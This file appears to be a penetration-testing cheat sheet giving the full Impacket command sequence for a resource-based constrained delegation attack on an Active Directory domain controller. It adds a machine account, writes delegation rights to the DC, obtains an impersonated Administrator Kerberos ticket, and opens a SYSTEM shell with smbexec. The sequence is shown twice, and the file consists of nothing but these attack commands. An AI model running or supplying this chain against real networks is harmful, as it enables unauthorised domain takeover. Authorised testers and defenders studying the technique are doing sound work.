eversinc33/rbcd_impacket.txt

## rbcd_impacket.txt
# add computer account
impacket-addcomputer domain/user:Password -dc-ip dc.domain.local

# add RBCD to added computer
impacket-rbcd domain/user:Password -delegate-to 'DC$' -dc-ip dc.domain.local -action write -delegate-from 'DESKTOP-XC3RS3G7$'

# get ticket for dc cifs for Administrator
impacket-getST -spn 'cifs/dc.domain.local' -impersonate Administrator -dc-ip dc.domain.local 'DOMAIN/DESKTOP-XC3RS3G7$:w06DJlMdlKNUVSpqN0olSEctZHZEQgZU'

# use ticket to get shell as SYSTEM
export KRB5CCNAME=$(pwd)Administrator.ccache
impacket-smbexec Administrator@dc.domain.local -k -no-pass
	# add computer account
	impacket-addcomputer domain/user:Password -dc-ip dc.domain.local

	# add RBCD to added computer
	impacket-rbcd domain/user:Password -delegate-to 'DC$' -dc-ip dc.domain.local -action write -delegate-from 'DESKTOP-XC3RS3G7$'

	# get ticket for dc cifs for Administrator
	impacket-getST -spn 'cifs/dc.domain.local' -impersonate Administrator -dc-ip dc.domain.local 'DOMAIN/DESKTOP-XC3RS3G7$:w06DJlMdlKNUVSpqN0olSEctZHZEQgZU'

	# use ticket to get shell as SYSTEM
	export KRB5CCNAME=$(pwd)Administrator.ccache
	impacket-smbexec Administrator@dc.domain.local -k -no-pass